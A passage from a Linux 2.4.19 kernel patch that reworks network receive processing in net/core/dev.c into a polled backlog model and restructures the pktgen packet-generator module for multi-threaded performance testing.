It helps fairness in the multi-interface * case when one of them is a hog, but it kills performance for the @@ -798,6 +803,19 @@ clear_bit(__LINK_STATE_START, &dev->state); + /* Synchronize to scheduled poll. We cannot touch poll list, + * it can be even on different cpu. So just clear netif_running(), + * and wait when poll really will happen. Actually, the best place + * for this is inside dev->stop() after device stopped its irq + * engine, but this requires more changes in devices. */ + + smp_mb__after_clear_bit(); /* Commit netif_running(). */ + while (test_bit(__LINK_STATE_RX_SCHED, &dev->state)) { + /* No hurry. */ + current->state = TASK_INTERRUPTIBLE; + schedule_timeout(1); + } + /* * Call the device specific close. This cannot fail. * Only if device is UP @@ -1072,6 +1090,7 @@ =======================================================================*/ int netdev_max_backlog = 300; +int weight_p = 64; /* old backlog weight */ /* These numbers are selected based on intuition and some * experimentatiom, if you have more scientific way of doing this * please go ahead and fix things. @@ -1237,13 +1256,11 @@ enqueue: dev_hold(skb->dev); __skb_queue_tail(&queue->input_pkt_queue,skb); - /* Runs from irqs or BH's, no need to wake BH */ - cpu_raise_softirq(this_cpu, NET_RX_SOFTIRQ); local_irq_restore(flags); #ifndef OFFLINE_SAMPLE get_sample_stats(this_cpu); #endif - return softnet_data[this_cpu].cng_level; + return queue->cng_level; } if (queue->throttle) { @@ -1253,6 +1270,8 @@ netdev_wakeup(); #endif } + + netif_rx_schedule(&queue->blog_dev); goto enqueue; } @@ -1308,19 +1327,12 @@ return ret; } -/* Reparent skb to master device. This function is called - * only from net_rx_action under BR_NETPROTO_LOCK. It is misuse - * of BR_NETPROTO_LOCK, but it is OK for now. 
- */ static __inline__ void skb_bond(struct sk_buff *skb) { struct net_device *dev = skb->dev; - - if (dev->master) { - dev_hold(dev->master); + + if (dev->master) skb->dev = dev->master; - dev_put(dev); - } } static void net_tx_action(struct softirq_action *h) @@ -1384,6 +1396,19 @@ br_write_unlock_bh(BR_NETPROTO_LOCK); } +#if defined(CONFIG_NET_PKTGEN) || defined(CONFIG_NET_PKTGEN_MODULE) +#warning "Compiling dev.c for pktgen."; + +int (*handle_pktgen_hook)(struct sk_buff *skb) = NULL; + +static __inline__ int handle_pktgen_rcv(struct sk_buff* skb) { + if (handle_pktgen_hook) { + return handle_pktgen_hook(skb); + } + return -1; +} +#endif + #if defined(CONFIG_BRIDGE) || defined(CONFIG_BRIDGE_MODULE) void (*br_handle_frame_hook)(struct sk_buff *skb) = NULL; #endif @@ -1408,129 +1433,159 @@ #ifdef CONFIG_NET_DIVERT -static inline void handle_diverter(struct sk_buff *skb) +static inline int handle_diverter(struct sk_buff *skb) { /* if diversion is supported on device, then divert */ if (skb->dev->divert && skb->dev->divert->divert) divert_frame(skb); + return 0; } #endif /* CONFIG_NET_DIVERT */ - -static void net_rx_action(struct softirq_action *h) +int netif_receive_skb(struct sk_buff *skb) { - int this_cpu = smp_processor_id(); - struct softnet_data *queue = &softnet_data[this_cpu]; - unsigned long start_time = jiffies; - int bugdet = netdev_max_backlog; - - br_read_lock(BR_NETPROTO_LOCK); - - for (;;) { - struct sk_buff *skb; - struct net_device *rx_dev; - - local_irq_disable(); - skb = __skb_dequeue(&queue->input_pkt_queue); - local_irq_enable(); + struct packet_type *ptype, *pt_prev; + int ret = NET_RX_DROP; + unsigned short type = skb->protocol; - if (skb == NULL) - break; + if (skb->stamp.tv_sec == 0) + do_gettimeofday(&skb->stamp); - skb_bond(skb); + skb_bond(skb); - rx_dev = skb->dev; + netdev_rx_stat[smp_processor_id()].total++; #ifdef CONFIG_NET_FASTROUTE - if (skb->pkt_type == PACKET_FASTROUTE) { - netdev_rx_stat[this_cpu].fastroute_deferred_out++; - 
dev_queue_xmit(skb); - dev_put(rx_dev); - continue; - } + if (skb->pkt_type == PACKET_FASTROUTE) { + netdev_rx_stat[smp_processor_id()].fastroute_deferred_out++; + return dev_queue_xmit(skb); + } #endif - skb->h.raw = skb->nh.raw = skb->data; - { - struct packet_type *ptype, *pt_prev; - unsigned short type = skb->protocol; - pt_prev = NULL; - for (ptype = ptype_all; ptype; ptype = ptype->next) { - if (!ptype->dev || ptype->dev == skb->dev) { - if (pt_prev) { - if (!pt_prev->data) { - deliver_to_old_ones(pt_prev, skb, 0); - } else { - atomic_inc(&skb->users); - pt_prev->func(skb, - skb->dev, - pt_prev); - } - } - pt_prev = ptype; + skb->h.raw = skb->nh.raw = skb->data; + + pt_prev = NULL; + for (ptype = ptype_all; ptype; ptype = ptype->next) { + if (!ptype->dev || ptype->dev == skb->dev) { + if (pt_prev) { + if (!pt_prev->data) { + ret = deliver_to_old_ones(pt_prev, skb, 0); + } else { + atomic_inc(&skb->users); + ret = pt_prev->func(skb, skb->dev, pt_prev); } } + pt_prev = ptype; + } + } + +#if defined(CONFIG_NET_PKTGEN) || defined(CONFIG_NET_PKTGEN_MODULE) + if ((skb->dev->priv_flags & IFF_PKTGEN_RCV) && + (handle_pktgen_rcv(skb) >= 0)) { + /* Pktgen may consume the packet, no need to send + * to further protocols. 
+ */ + return 0; + } +#endif + #ifdef CONFIG_NET_DIVERT - if (skb->dev->divert && skb->dev->divert->divert) - handle_diverter(skb); + if (skb->dev->divert && skb->dev->divert->divert) + ret = handle_diverter(skb); #endif /* CONFIG_NET_DIVERT */ - + #if defined(CONFIG_BRIDGE) || defined(CONFIG_BRIDGE_MODULE) - if (skb->dev->br_port != NULL && - br_handle_frame_hook != NULL) { - handle_bridge(skb, pt_prev); - dev_put(rx_dev); - continue; - } + if (skb->dev->br_port != NULL && + br_handle_frame_hook != NULL) { + return handle_bridge(skb, pt_prev); + } #endif - for (ptype=ptype_base[ntohs(type)&15];ptype;ptype=ptype->next) { - if (ptype->type == type && - (!ptype->dev || ptype->dev == skb->dev)) { - if (pt_prev) { - if (!pt_prev->data) - deliver_to_old_ones(pt_prev, skb, 0); - else { - atomic_inc(&skb->users); - pt_prev->func(skb, - skb->dev, - pt_prev); - } - } - pt_prev = ptype; + for (ptype=ptype_base[ntohs(type)&15];ptype;ptype=ptype->next) { + if (ptype->type == type && + (!ptype->dev || ptype->dev == skb->dev)) { + if (pt_prev) { + if (!pt_prev->data) { + ret = deliver_to_old_ones(pt_prev, skb, 0); + } else { + atomic_inc(&skb->users); + ret = pt_prev->func(skb, skb->dev, pt_prev); } } + pt_prev = ptype; + } + } - if (pt_prev) { - if (!pt_prev->data) - deliver_to_old_ones(pt_prev, skb, 1); - else - pt_prev->func(skb, skb->dev, pt_prev); - } else - kfree_skb(skb); + if (pt_prev) { + if (!pt_prev->data) { + ret = deliver_to_old_ones(pt_prev, skb, 1); + } else { + ret = pt_prev->func(skb, skb->dev, pt_prev); } + } else { + kfree_skb(skb); + /* Jamal, now you will not able to escape explaining + * me how you were going to use this. 
:-) + */ + ret = NET_RX_DROP; + } - dev_put(rx_dev); + return ret; +} - if (bugdet-- < 0 || jiffies - start_time > 1) - goto softnet_break; +static int process_backlog(struct net_device *blog_dev, int *budget) +{ + int work = 0; + int quota = min(blog_dev->quota, *budget); + int this_cpu = smp_processor_id(); + struct softnet_data *queue = &softnet_data[this_cpu]; + unsigned long start_time = jiffies; + + for (;;) { + struct sk_buff *skb; + struct net_device *dev; + + local_irq_disable(); + skb = __skb_dequeue(&queue->input_pkt_queue); + if (skb == NULL) + goto job_done; + local_irq_enable(); + + dev = skb->dev; + + netif_receive_skb(skb); + + dev_put(dev); + + work++; + + if (work >= quota || jiffies - start_time > 1) + break; #ifdef CONFIG_NET_HW_FLOWCONTROL - if (queue->throttle && queue->input_pkt_queue.qlen < no_cong_thresh ) { - if (atomic_dec_and_test(&netdev_dropping)) { - queue->throttle = 0; - netdev_wakeup(); - goto softnet_break; + if (queue->throttle && queue->input_pkt_queue.qlen < no_cong_thresh ) { + if (atomic_dec_and_test(&netdev_dropping)) { + queue->throttle = 0; + netdev_wakeup(); + break; + } } - } #endif - } - br_read_unlock(BR_NETPROTO_LOCK); - local_irq_disable(); + blog_dev->quota -= work; + *budget -= work; + return -1; + +job_done: + blog_dev->quota -= work; + *budget -= work; + + list_del(&blog_dev->poll_list); + clear_bit(__LINK_STATE_RX_SCHED, &blog_dev->state); + if (queue->throttle) { queue->throttle = 0; #ifdef CONFIG_NET_HW_FLOWCONTROL @@ -1539,21 +1594,53 @@ #endif } local_irq_enable(); + return 0; +} - NET_PROFILE_LEAVE(softnet_process); - return; +static void net_rx_action(struct softirq_action *h) +{ + int this_cpu = smp_processor_id(); + struct softnet_data *queue = &softnet_data[this_cpu]; + unsigned long start_time = jiffies; + int budget = netdev_max_backlog; -softnet_break: + br_read_lock(BR_NETPROTO_LOCK); + local_irq_disable(); + + while (!list_empty(&queue->poll_list)) { + struct net_device *dev; + + if (budget <= 0 || 
jiffies - start_time > 1) + goto softnet_break; + + local_irq_enable(); + + dev = list_entry(queue->poll_list.next, struct net_device, poll_list); + + if (dev->quota <= 0 || dev->poll(dev, &budget)) { + local_irq_disable(); + list_del(&dev->poll_list); + list_add_tail(&dev->poll_list, &queue->poll_list); + if (dev->quota < 0) + dev->quota += dev->weight; + else + dev->quota = dev->weight; + } else { + dev_put(dev); + local_irq_disable(); + } + } + + local_irq_enable(); br_read_unlock(BR_NETPROTO_LOCK); + return; - local_irq_disable(); +softnet_break: netdev_rx_stat[this_cpu].time_squeeze++; - /* This already runs in BH context, no need to wake up BH's */ - cpu_raise_softirq(this_cpu, NET_RX_SOFTIRQ); - local_irq_enable(); + __cpu_raise_softirq(this_cpu, NET_RX_SOFTIRQ); - NET_PROFILE_LEAVE(softnet_process); - return; + local_irq_enable(); + br_read_unlock(BR_NETPROTO_LOCK); } static gifconf_func_t * gifconf_list [NPROTO]; @@ -2094,6 +2181,24 @@ notifier_call_chain(&netdev_chain, NETDEV_CHANGENAME, dev); return 0; + case SIOCSACCEPTLOCALADDRS: + if (ifr->ifr_flags) { + dev->priv_flags |= IFF_ACCEPT_LOCAL_ADDRS; + } + else { + dev->priv_flags &= ~IFF_ACCEPT_LOCAL_ADDRS; + } + return 0; + + case SIOCGACCEPTLOCALADDRS: + if (dev->priv_flags & IFF_ACCEPT_LOCAL_ADDRS) { + ifr->ifr_flags = 1; + } + else { + ifr->ifr_flags = 0; + } + return 0; + /* * Unknown or private ioctl */ @@ -2190,6 +2295,7 @@ case SIOCGIFMAP: case SIOCGIFINDEX: case SIOCGIFTXQLEN: + case SIOCGACCEPTLOCALADDRS: dev_load(ifr.ifr_name); read_lock(&dev_base_lock); ret = dev_ifsioc(&ifr, cmd); @@ -2253,6 +2359,7 @@ case SIOCBONDSLAVEINFOQUERY: case SIOCBONDINFOQUERY: case SIOCBONDCHANGEACTIVE: + case SIOCSACCEPTLOCALADDRS: if (!capable(CAP_NET_ADMIN)) return -EPERM; dev_load(ifr.ifr_name); @@ -2607,6 +2714,7 @@ extern void net_device_init(void); extern void ip_auto_config(void); +struct proc_dir_entry *proc_net_drivers; #ifdef CONFIG_NET_DIVERT extern void dv_init(void); #endif /* CONFIG_NET_DIVERT */ @@ 
-2624,6 +2732,7 @@ if (!dev_boot_phase) return 0; + #ifdef CONFIG_NET_DIVERT dv_init(); #endif /* CONFIG_NET_DIVERT */ @@ -2641,8 +2750,13 @@ queue->cng_level = 0; queue->avg_blog = 10; /* arbitrary non-zero */ queue->completion_queue = NULL; + INIT_LIST_HEAD(&queue->poll_list); + set_bit(__LINK_STATE_START, &queue->blog_dev.state); + queue->blog_dev.weight = weight_p; + queue->blog_dev.poll = process_backlog; + atomic_set(&queue->blog_dev.refcnt, 1); } - + #ifdef CONFIG_NET_PROFILE net_profile_init(); NET_PROFILE_REGISTER(dev_queue_xmit); @@ -2725,6 +2839,7 @@ #ifdef CONFIG_PROC_FS proc_net_create("dev", 0, dev_get_info); create_proc_read_entry("net/softnet_stat", 0, 0, dev_proc_stats, NULL); + proc_net_drivers = proc_mkdir("net/drivers", 0); #ifdef WIRELESS_EXT /* Available in net/core/wireless.c */ proc_net_create("wireless", 0, dev_get_wireless_info); @@ -2742,7 +2857,6 @@ #ifdef CONFIG_NET_SCHED pktsched_init(); #endif - /* * Initialise network devices */ --- linux-2.4.19/net/core/pktgen.c Fri Aug 2 17:39:46 2002 +++ linux-2.4.19.dev/net/core/pktgen.c Mon Sep 16 23:53:41 2002 @@ -1,8 +1,8 @@ -/* $Id: pg_2.4.19.patch,v 1.5 2002/09/17 07:01:55 greear Exp $ - * pktgen.c: Packet Generator for performance evaluation. +/* -*-linux-c-*- * * Copyright 2001, 2002 by Robert Olsson * Uppsala University, Sweden + * 2002 Ben Greear * * A tool for loading the network with preconfigurated packets. * The tool is implemented as a linux module. Parameters are output @@ -19,6 +19,33 @@ * Integrated. 020301 --DaveM * Added multiskb option 020301 --DaveM * Scaling of results. 020417--sigurdur@linpro.no + * Significant re-work of the module: + * * Convert to threaded model to more efficiently be able to transmit + * and receive on multiple interfaces at once. + * * Converted many counters to __u64 to allow longer runs. 
+ * * Allow configuration of ranges, like min/max IP address, MACs, + * and UDP-ports, for both source and destination, and can + * set to use a random distribution or sequentially walk the range. + * * Can now change most values after starting. + * * Place 12-byte packet in UDP payload with magic number, + * sequence number, and timestamp. + * * Add receiver code that detects dropped pkts, re-ordered pkts, and + * latencies (with micro-second) precision. + * * Add IOCTL interface to easily get counters & configuration. + * --Ben Greear + * + * Renamed multiskb to clone_skb and cleaned up sending core for two distinct + * skb modes. A clone_skb=0 mode for Ben "ranges" work and a clone_skb != 0 + * as a "fastpath" with a configurable number of clones after alloc's. + * clone_skb=0 means all packets are allocated this also means ranges time + * stamps etc can be used. clone_skb=100 means 1 malloc is followed by 100 + * clones. + * + * Also moved to /proc/net/pktgen/ + * --ro + * + * Sept 10: Fixed threading/locking. Lots of bone-headed and more clever + * mistakes. Also merged in DaveM's patch in the -pre6 patch. * * See Documentation/networking/pktgen.txt for how to use this. */ @@ -41,6 +68,7 @@ #include #include #include +#include #include #include @@ -52,142 +80,822 @@ #include #include #include +#include #include -#define cycles() ((u32)get_cycles()) +#include /* for lock kernel */ +#include /* do_div */ + +#include "pktgen.h" + static char version[] __initdata = - "pktgen.c: v1.1 020418: Packet Generator for packet performance testing.\n"; + "pktgen.c: v1.6: Packet Generator for packet performance testing.\n"; + +/* Used to help with determining the pkts on receive */ + +#define PKTGEN_MAGIC 0xbe9be955 + +/* #define PG_DEBUG(a) a */ +#define PG_DEBUG(a) /* a */ + +/* cycles per micro-second */ +static u32 pg_cycles_per_ns; +static u32 pg_cycles_per_us; +static u32 pg_cycles_per_ms; + +/* Module parameters, defaults. 
*/ +static int pg_count_d = 0; /* run forever by default */ +static int pg_ipg_d = 0; +static int pg_multiskb_d = 0; +static int pg_thread_count = 1; /* Initial threads to create */ +static int debug = 0; -/* Parameters */ -static char pg_outdev[32], pg_dst[32]; -static int pkt_size = ETH_ZLEN; -static int nfrags = 0; -static __u32 pg_count = 100000; /* Default No packets to send */ -static __u32 pg_ipg = 0; /* Default Interpacket gap in nsec */ -static int pg_multiskb = 0; /* Use multiple SKBs during packet gen. */ - -static int debug; -static int forced_stop; -static int pg_cpu_speed; -static int pg_busy; - -static __u8 hh[14] = { - - /* Overrun by /proc config */ - - 0x00, 0x80, 0xC8, 0x79, 0xB3, 0xCB, - - /* We fill in SRC address later */ - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x08, 0x00 + + +/* List of all running threads */ +static struct pktgen_thread_info* pktgen_threads = NULL; +spinlock_t _pg_threadlist_lock = SPIN_LOCK_UNLOCKED; + +/* Holds interfaces for all threads */ +#define PG_INFO_HASH_MAX 32 +static struct pktgen_interface_info* pg_info_hash[PG_INFO_HASH_MAX]; +spinlock_t _pg_hash_lock = SPIN_LOCK_UNLOCKED; + +#define PG_PROC_DIR "pktgen" +static struct proc_dir_entry *pg_proc_dir = NULL; + +char module_fname[128]; +struct proc_dir_entry *module_proc_ent = NULL; + + +static void init_pktgen_kthread(struct pktgen_thread_info *kthread, char *name); +static int pg_rem_interface_info(struct pktgen_thread_info* pg_thread, + struct pktgen_interface_info* i); +static int pg_add_interface_info(struct pktgen_thread_info* pg_thread, + const char* ifname); +static void exit_pktgen_kthread(struct pktgen_thread_info *kthread); +static void stop_pktgen_kthread(struct pktgen_thread_info *kthread); +static struct pktgen_thread_info* pg_find_thread(const char* name); +static int pg_add_thread_info(const char* name); +static struct pktgen_interface_info* pg_find_interface(struct pktgen_thread_info* pg_thread, + const char* ifname); +static int 
pktgen_device_event(struct notifier_block *, unsigned long, void *); + + +struct notifier_block pktgen_notifier_block = { + notifier_call: pktgen_device_event, }; -static unsigned char *pg_dstmac = hh; -static char pg_result[512]; +/* This code works around the fact that do_div cannot handle two 64-bit + numbers, and regular 64-bit division doesn't work on x86 kernels. + --Ben +*/ -static struct net_device *pg_setup_inject(u32 *saddrp) -{ - struct net_device *odev; - int p1, p2; - u32 saddr; +#define PG_DIV 0 +#define PG_REM 1 - rtnl_lock(); - odev = __dev_get_by_name(pg_outdev); - if (!odev) { - sprintf(pg_result, "No such netdevice: \"%s\"", pg_outdev); - goto out_unlock; - } +/* This was emailed to LKML by: Chris Caputo + * Function copied/adapted/optimized from: + * + * nemesis.sourceforge.net/browse/lib/static/intmath/ix86/intmath.c.html + * + * Copyright 1994, University of Cambridge Computer Laboratory + * All Rights Reserved. + * + * TODO: When running on a 64-bit CPU platform, this should no longer be + * TODO: necessary. + */ +inline static s64 divremdi3(s64 x, s64 y, int type) { + u64 a = (x < 0) ? -x : x; + u64 b = (y < 0) ? -y : y; + u64 res = 0, d = 1; + + if (b > 0) { + while (b < a) { + b <<= 1; + d <<= 1; + } + } + + do { + if ( a >= b ) { + a -= b; + res += d; + } + b >>= 1; + d >>= 1; + } + while (d); + + if (PG_DIV == type) { + return (((x ^ y) & (1ll<<63)) == 0) ? res : -(s64)res; + } + else { + return ((x & (1ll<<63)) == 0) ? 
a : -(s64)a; + } +}/* divremdi3 */ + +/* End of hacks to deal with 64-bit math on x86 */ - if (odev->type != ARPHRD_ETHER) { - sprintf(pg_result, "Not ethernet device: \"%s\"", pg_outdev); - goto out_unlock; - } - if (!netif_running(odev)) { - sprintf(pg_result, "Device is down: \"%s\"", pg_outdev); - goto out_unlock; - } - for (p1 = 6, p2 = 0; p1 < odev->addr_len + 6; p1++) - hh[p1] = odev->dev_addr[p2++]; +inline static void pg_lock_thread_list(char* msg) { + if (debug > 1) { + printk("before pg_lock_thread_list, msg: %s\n", msg); + } + spin_lock(&_pg_threadlist_lock); + if (debug > 1) { + printk("after pg_lock_thread_list, msg: %s\n", msg); + } +} - saddr = 0; - if (odev->ip_ptr) { - struct in_device *in_dev = odev->ip_ptr; +inline static void pg_unlock_thread_list(char* msg) { + if (debug > 1) { + printk("before pg_unlock_thread_list, msg: %s\n", msg); + } + spin_unlock(&_pg_threadlist_lock); + if (debug > 1) { + printk("after pg_unlock_thread_list, msg: %s\n", msg); + } +} - if (in_dev->ifa_list) - saddr = in_dev->ifa_list->ifa_address; - } - atomic_inc(&odev->refcnt); - rtnl_unlock(); +inline static void pg_lock_hash(char* msg) { + if (debug > 1) { + printk("before pg_lock_hash, msg: %s\n", msg); + } + spin_lock(&_pg_hash_lock); + if (debug > 1) { + printk("after pg_lock_hash, msg: %s\n", msg); + } +} - *saddrp = saddr; - return odev; +inline static void pg_unlock_hash(char* msg) { + if (debug > 1) { + printk("before pg_unlock_hash, msg: %s\n", msg); + } + spin_unlock(&_pg_hash_lock); + if (debug > 1) { + printk("after pg_unlock_hash, msg: %s\n", msg); + } +} -out_unlock: - rtnl_unlock(); - return NULL; +inline static void pg_lock(struct pktgen_thread_info* pg_thread, char* msg) { + if (debug > 1) { + printk("before pg_lock thread, msg: %s\n", msg); + } + spin_lock(&(pg_thread->pg_threadlock)); + if (debug > 1) { + printk("after pg_lock thread, msg: %s\n", msg); + } } -static u32 idle_acc_lo, idle_acc_hi; +inline static void pg_unlock(struct 
pktgen_thread_info* pg_thread, char* msg) { + if (debug > 1) { + printk("before pg_unlock thread, thread: %p msg: %s\n", + pg_thread, msg); + } + spin_unlock(&(pg_thread->pg_threadlock)); + if (debug > 1) { + printk("after pg_unlock thread, thread: %p msg: %s\n", + pg_thread, msg); + } +} + +/** Convert to milliseconds */ +static inline __u64 tv_to_ms(const struct timeval* tv) { + __u64 ms = tv->tv_usec / 1000; + ms += (__u64)tv->tv_sec * (__u64)1000; + return ms; +} -static void nanospin(int pg_ipg) + +/** Convert to micro-seconds */ +static inline __u64 tv_to_us(const struct timeval* tv) { + __u64 us = tv->tv_usec; + us += (__u64)tv->tv_sec * (__u64)1000000; + return us; +} + + +static inline __u64 pg_div(__u64 n, __u32 base) { + __u64 tmp = n; + do_div(tmp, base); + /* printk("pg_div, n: %llu base: %d rv: %llu\n", + n, base, tmp); */ + return tmp; +} + +/* Fast, not horribly accurate, since the machine started. */ +static inline __u64 getRelativeCurMs(void) { + return pg_div(get_cycles(), pg_cycles_per_ms); +} + +/* Since the epoch. More precise over long periods of time than + * getRelativeCurMs + */ +static inline __u64 getCurMs(void) { + struct timeval tv; + do_gettimeofday(&tv); + return tv_to_ms(&tv); +} + +/* Since the epoch. More precise over long periods of time than + * getRelativeCurUs + */ +static inline __u64 getCurUs(void) { + struct timeval tv; + do_gettimeofday(&tv); + return tv_to_us(&tv); +} + +/* Since the machine booted. */ +static inline __u64 getRelativeCurUs(void) { + return pg_div(get_cycles(), pg_cycles_per_us); +} + +/* Since the machine booted. 
*/ +static inline __u64 getRelativeCurNs(void) { + return pg_div(get_cycles(), pg_cycles_per_ns); +} + +static inline __u64 tv_diff(const struct timeval* a, const struct timeval* b) { + return tv_to_us(a) - tv_to_us(b); +} + + + +int pktgen_proc_ioctl(struct inode* inode, struct file* file, unsigned int cmd, + unsigned long arg) { + int err = 0; + struct pktgen_ioctl_info args; + struct pktgen_thread_info* targ = NULL; + + /* + if (!capable(CAP_NET_ADMIN)){ + return -EPERM; + } + */ + + if (copy_from_user(&args, (void*)arg, sizeof(args))) { + return -EFAULT; + } + + /* Null terminate the names */ + args.thread_name[31] = 0; + args.interface_name[31] = 0; + + /* printk("pktgen: thread_name: %s interface_name: %s\n", + * args.thread_name, args.interface_name); + */ + + switch (cmd) { + case GET_PKTGEN_INTERFACE_INFO: { + targ = pg_find_thread(args.thread_name); + if (targ) { + struct pktgen_interface_info* info; + info = pg_find_interface(targ, args.interface_name); + if (info) { + memcpy(&(args.info), info, sizeof(args.info)); + if (copy_to_user((void*)(arg), &args, sizeof(args))) { + printk("ERROR: pktgen: copy_to_user failed.\n"); + err = -EFAULT; + } + else { + err = 0; + } + } + else { + printk("ERROR: pktgen: Could not find interface -:%s:-\n", + args.interface_name); + err = -ENODEV; + } + } + else { + printk("ERROR: pktgen: Could not find thread -:%s:-.\n", + args.thread_name); + err = -ENODEV; + } + break; + } + default: + /* pass on to underlying device instead?? */ + printk(__FUNCTION__ ": Unknown pktgen IOCTL: %x \n", + cmd); + return -EINVAL; + } + + return err; +}/* pktgen_proc_ioctl */ + +static struct file_operations pktgen_fops = { + ioctl: pktgen_proc_ioctl, +}; + +static void remove_pg_info_from_hash(struct pktgen_interface_info* info) { + pg_lock_hash(__FUNCTION__); + { + int device_idx = info->odev ? 
info->odev->ifindex : 0; + int b = device_idx % PG_INFO_HASH_MAX; + struct pktgen_interface_info* p = pg_info_hash[b]; + struct pktgen_interface_info* prev = pg_info_hash[b]; + + PG_DEBUG(printk("remove_pg_info_from_hash, p: %p info: %p device_idx: %i\n", + p, info, device_idx)); + + if (p != NULL) { + + if (p == info) { + pg_info_hash[b] = p->next_hash; + p->next_hash = NULL; + } + else { + while (prev->next_hash) { + p = prev->next_hash; + if (p == info) { + prev->next_hash = p->next_hash; + p->next_hash = NULL; + break; + } + prev = p; + } + } + } + + if (info->odev) { + info->odev->priv_flags &= ~(IFF_PKTGEN_RCV); + } + } + pg_unlock_hash(__FUNCTION__); +}/* remove_pg_info_from_hash */ + + +static void add_pg_info_to_hash(struct pktgen_interface_info* info) { + /* First remove it, just in case it's already there. */ + remove_pg_info_from_hash(info); + + pg_lock_hash(__FUNCTION__); + { + int device_idx = info->odev ? info->odev->ifindex : 0; + int b = device_idx % PG_INFO_HASH_MAX; + + PG_DEBUG(printk("add_pg_info_from_hash, b: %i info: %p device_idx: %i\n", + b, info, device_idx)); + + info->next_hash = pg_info_hash[b]; + pg_info_hash[b] = info; + + + if (info->odev) { + info->odev->priv_flags |= (IFF_PKTGEN_RCV); + } + } + pg_unlock_hash(__FUNCTION__); +}/* add_pg_info_to_hash */ + + +/* Find the pktgen_interface_info for a device idx */ +struct pktgen_interface_info* find_pg_info(int device_idx) { + struct pktgen_interface_info* p = NULL; + if (debug > 1) { + printk("in find_pg_info...\n"); + } + pg_lock_hash(__FUNCTION__); + { + int b = device_idx % PG_INFO_HASH_MAX; + p = pg_info_hash[b]; + while (p) { + if (p->odev && (p->odev->ifindex == device_idx)) { + break; + } + p = p->next_hash; + } + } + pg_unlock_hash(__FUNCTION__); + return p; +} + + +/* Remove an interface from our hash, dissassociate pktgen_interface_info + * from interface + */ +static void check_remove_device(struct pktgen_interface_info* info) { + struct pktgen_interface_info* pi = NULL; + 
if (info->odev) { + pi = find_pg_info(info->odev->ifindex); + if (pi != info) { + printk("ERROR: pi != info\n"); + } + else { + /* Remove info from our hash */ + remove_pg_info_from_hash(info); + } + + rtnl_lock(); + info->odev->priv_flags &= ~(IFF_PKTGEN_RCV); + atomic_dec(&(info->odev->refcnt)); + info->odev = NULL; + rtnl_unlock(); + } +}/* check_remove_device */ + + +static int pg_remove_interface_from_all_threads(const char* dev_name) { + int cnt = 0; + pg_lock_thread_list(__FUNCTION__); + { + struct pktgen_thread_info* tmp = pktgen_threads; + struct pktgen_interface_info* info = NULL; + + while (tmp) { + info = pg_find_interface(tmp, dev_name); + if (info) { + pg_rem_interface_info(tmp, info); + cnt++; + } + tmp = tmp->next; + } + } + pg_unlock_thread_list(__FUNCTION__); + return cnt; +}/* pg_rem_interface_from_all_threads */ + + +static int pktgen_device_event(struct notifier_block *unused, unsigned long event, void *ptr) { + struct net_device *dev = (struct net_device *)(ptr); + + /* It is OK that we do not hold the group lock right now, + * as we run under the RTNL lock. + */ + + switch (event) { + case NETDEV_CHANGEADDR: + case NETDEV_GOING_DOWN: + case NETDEV_DOWN: + case NETDEV_UP: + /* Ignore for now */ + break; + + case NETDEV_UNREGISTER: + pg_remove_interface_from_all_threads(dev->name); + break; + }; + + return NOTIFY_DONE; +} + + +/* Associate pktgen_interface_info with a device. 
+ */ +static struct net_device* pg_setup_interface(struct pktgen_interface_info* info) { + struct net_device *odev; + + check_remove_device(info); + + rtnl_lock(); + odev = __dev_get_by_name(info->ifname); + if (!odev) { + printk("No such netdevice: \"%s\"\n", info->ifname); + } + else if (odev->type != ARPHRD_ETHER) { + printk("Not an ethernet device: \"%s\"\n", info->ifname); + } + else if (!netif_running(odev)) { + printk("Device is down: \"%s\"\n", info->ifname); + } + else if (odev->priv_flags & IFF_PKTGEN_RCV) { + printk("ERROR: Device: \"%s\" is already assigned to a pktgen interface.\n", + info->ifname); + } + else { + atomic_inc(&odev->refcnt); + info->odev = odev; + info->odev->priv_flags |= (IFF_PKTGEN_RCV); + } + + rtnl_unlock(); + + if (info->odev) { + add_pg_info_to_hash(info); + } + + return info->odev; +} + +/* Read info from the interface and set up internal pktgen_interface_info + * structure to have the right information to create/send packets + */ +static void pg_setup_inject(struct pktgen_interface_info* info) { - u32 idle_start, idle; + if (!info->odev) { + /* Try once more, just in case it works now. */ + pg_setup_interface(info); + } + + if (!info->odev) { + printk("ERROR: info->odev == NULL in setup_inject.\n"); + sprintf(info->result, "ERROR: info->odev == NULL in setup_inject.\n"); + return; + } + + /* Default to the interface's mac if not explicitly set. 
*/ + if (!(info->flags & F_SET_SRCMAC)) { + memcpy(&(info->hh[6]), info->odev->dev_addr, 6); + } + else { + memcpy(&(info->hh[6]), info->src_mac, 6); + } + + /* Set up Dest MAC */ + memcpy(&(info->hh[0]), info->dst_mac, 6); + + /* Set up pkt size */ + info->cur_pkt_size = info->min_pkt_size; + + info->saddr_min = 0; + info->saddr_max = 0; + if (strlen(info->src_min) == 0) { + if (info->odev->ip_ptr) { + struct in_device *in_dev = info->odev->ip_ptr; + + if (in_dev->ifa_list) { + info->saddr_min = in_dev->ifa_list->ifa_address; + info->saddr_max = info->saddr_min; + } + } + } + else { + info->saddr_min = in_aton(info->src_min); + info->saddr_max = in_aton(info->src_max); + } + + info->daddr_min = in_aton(info->dst_min); + info->daddr_max = in_aton(info->dst_max); + + /* Initialize current values. */ + info->cur_dst_mac_offset = 0; + info->cur_src_mac_offset = 0; + info->cur_saddr = info->saddr_min; + info->cur_daddr = info->daddr_min; + info->cur_udp_dst = info->udp_dst_min; + info->cur_udp_src = info->udp_src_min; +} - idle_start = cycles(); +/* ipg is in nano-seconds */ +static void nanospin(__u32 ipg, struct pktgen_interface_info* info) +{ + u64 idle_start = get_cycles(); + u64 idle; for (;;) { barrier(); - idle = cycles() - idle_start; - if (idle * 1000 >= pg_ipg * pg_cpu_speed) + idle = get_cycles() - idle_start; + if (idle * 1000 >= ipg * pg_cycles_per_us) break; } - idle_acc_lo += idle; - if (idle_acc_lo < idle) - idle_acc_hi++; + info->idle_acc += idle; +} + + +/* ipg is in micro-seconds (usecs) */ +static void pg_udelay(__u32 delay_us, struct pktgen_interface_info* info) +{ + u64 start = getRelativeCurUs(); + u64 now; + + for (;;) { + do_softirq(); + now = getRelativeCurUs(); + if (start + delay_us <= (now - 10)) { + break; + } + + if (!info->do_run_run) { + return; + } + + if (current->need_resched) { + schedule(); + } + + now = getRelativeCurUs(); + if (start + delay_us <= (now - 10)) { + break; + } + } + + info->idle_acc += (1000 * (now - start)); + + /* 
